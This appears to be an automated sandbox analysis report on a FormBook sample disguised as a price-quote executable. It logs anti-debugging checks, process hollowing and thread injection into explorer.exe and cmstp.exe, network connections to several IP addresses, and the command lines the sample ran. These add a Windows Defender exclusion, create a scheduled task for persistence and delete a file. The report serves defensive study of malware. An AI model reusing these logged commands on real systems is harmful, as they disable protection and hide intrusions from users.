Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50BBE mov eax, dword ptr fs:[00000030h]	10_2_01A50BBE
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF4BB0 mov eax, dword ptr fs:[00000030h]	10_2_01AF4BB0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF4BB0 mov eax, dword ptr fs:[00000030h]	10_2_01AF4BB0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48BF0 mov eax, dword ptr fs:[00000030h]	10_2_01A48BF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48BF0 mov eax, dword ptr fs:[00000030h]	10_2_01A48BF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48BF0 mov eax, dword ptr fs:[00000030h]	10_2_01A48BF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6EBFC mov eax, dword ptr fs:[00000030h]	10_2_01A6EBFC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACCBF0 mov eax, dword ptr fs:[00000030h]	10_2_01ACCBF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40BCD mov eax, dword ptr fs:[00000030h]	10_2_01A40BCD
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40BCD mov eax, dword ptr fs:[00000030h]	10_2_01A40BCD
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40BCD mov eax, dword ptr fs:[00000030h]	10_2_01A40BCD
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A60BCB mov eax, dword ptr fs:[00000030h]	10_2_01A60BCB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A60BCB mov eax, dword ptr fs:[00000030h]	10_2_01A60BCB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A60BCB mov eax, dword ptr fs:[00000030h]	10_2_01A60BCB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEEBD0 mov eax, dword ptr fs:[00000030h]	10_2_01AEEBD0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6EB20 mov eax, dword ptr fs:[00000030h]	10_2_01A6EB20
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6EB20 mov eax, dword ptr fs:[00000030h]	10_2_01A6EB20
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B08B28 mov eax, dword ptr fs:[00000030h]	10_2_01B08B28
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B08B28 mov eax, dword ptr fs:[00000030h]	10_2_01B08B28
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14B00 mov eax, dword ptr fs:[00000030h]	10_2_01B14B00
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	10_2_01ABEB1D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3CB7E mov eax, dword ptr fs:[00000030h]	10_2_01A3CB7E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF4B4B mov eax, dword ptr fs:[00000030h]	10_2_01AF4B4B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF4B4B mov eax, dword ptr fs:[00000030h]	10_2_01AF4B4B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B12B57 mov eax, dword ptr fs:[00000030h]	10_2_01B12B57
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B12B57 mov eax, dword ptr fs:[00000030h]	10_2_01B12B57
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B12B57 mov eax, dword ptr fs:[00000030h]	10_2_01B12B57
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B12B57 mov eax, dword ptr fs:[00000030h]	10_2_01B12B57
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE8B42 mov eax, dword ptr fs:[00000030h]	10_2_01AE8B42
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD6B40 mov eax, dword ptr fs:[00000030h]	10_2_01AD6B40
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD6B40 mov eax, dword ptr fs:[00000030h]	10_2_01AD6B40
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0AB40 mov eax, dword ptr fs:[00000030h]	10_2_01B0AB40
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A38B50 mov eax, dword ptr fs:[00000030h]	10_2_01A38B50
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEEB50 mov eax, dword ptr fs:[00000030h]	10_2_01AEEB50
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48AA0 mov eax, dword ptr fs:[00000030h]	10_2_01A48AA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48AA0 mov eax, dword ptr fs:[00000030h]	10_2_01A48AA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A96AA4 mov eax, dword ptr fs:[00000030h]	10_2_01A96AA4
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14A80 mov eax, dword ptr fs:[00000030h]	10_2_01B14A80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A78A90 mov edx, dword ptr fs:[00000030h]	10_2_01A78A90
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7AAEE mov eax, dword ptr fs:[00000030h]	10_2_01A7AAEE
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7AAEE mov eax, dword ptr fs:[00000030h]	10_2_01A7AAEE
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A96ACC mov eax, dword ptr fs:[00000030h]	10_2_01A96ACC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A96ACC mov eax, dword ptr fs:[00000030h]	10_2_01A96ACC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A96ACC mov eax, dword ptr fs:[00000030h]	10_2_01A96ACC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40AD0 mov eax, dword ptr fs:[00000030h]	10_2_01A40AD0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A74AD0 mov eax, dword ptr fs:[00000030h]	10_2_01A74AD0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A74AD0 mov eax, dword ptr fs:[00000030h]	10_2_01A74AD0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7CA24 mov eax, dword ptr fs:[00000030h]	10_2_01A7CA24
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6EA2E mov eax, dword ptr fs:[00000030h]	10_2_01A6EA2E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A64A35 mov eax, dword ptr fs:[00000030h]	10_2_01A64A35
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A64A35 mov eax, dword ptr fs:[00000030h]	10_2_01A64A35
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7CA38 mov eax, dword ptr fs:[00000030h]	10_2_01A7CA38
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACCA11 mov eax, dword ptr fs:[00000030h]	10_2_01ACCA11
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	10_2_01A7CA6F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	10_2_01A7CA6F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	10_2_01A7CA6F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEEA60 mov eax, dword ptr fs:[00000030h]	10_2_01AEEA60

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Code function: 10_2_01A82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,

10_2_01A82BF0

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 108.179.194.28 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.12.93.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.157.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.203.148.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.242 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 212.129.41.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.6.237.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: A10000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Thread register set: target process: 3504			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Thread register set: target process: 3504			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe			Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmp17EA.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process created: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe"	Jump to behavior

Source: explorer.exe, 00000010.00000000.1534701562.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.3881299286.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000010.00000003.2291641463.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3901573939.00000000087E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1535792968.0000000004480000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.1534701562.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.3881299286.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.1534701562.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.3881299286.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000000.1534517413.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3880153485.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanq

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Queries volume information: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Queries volume information: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
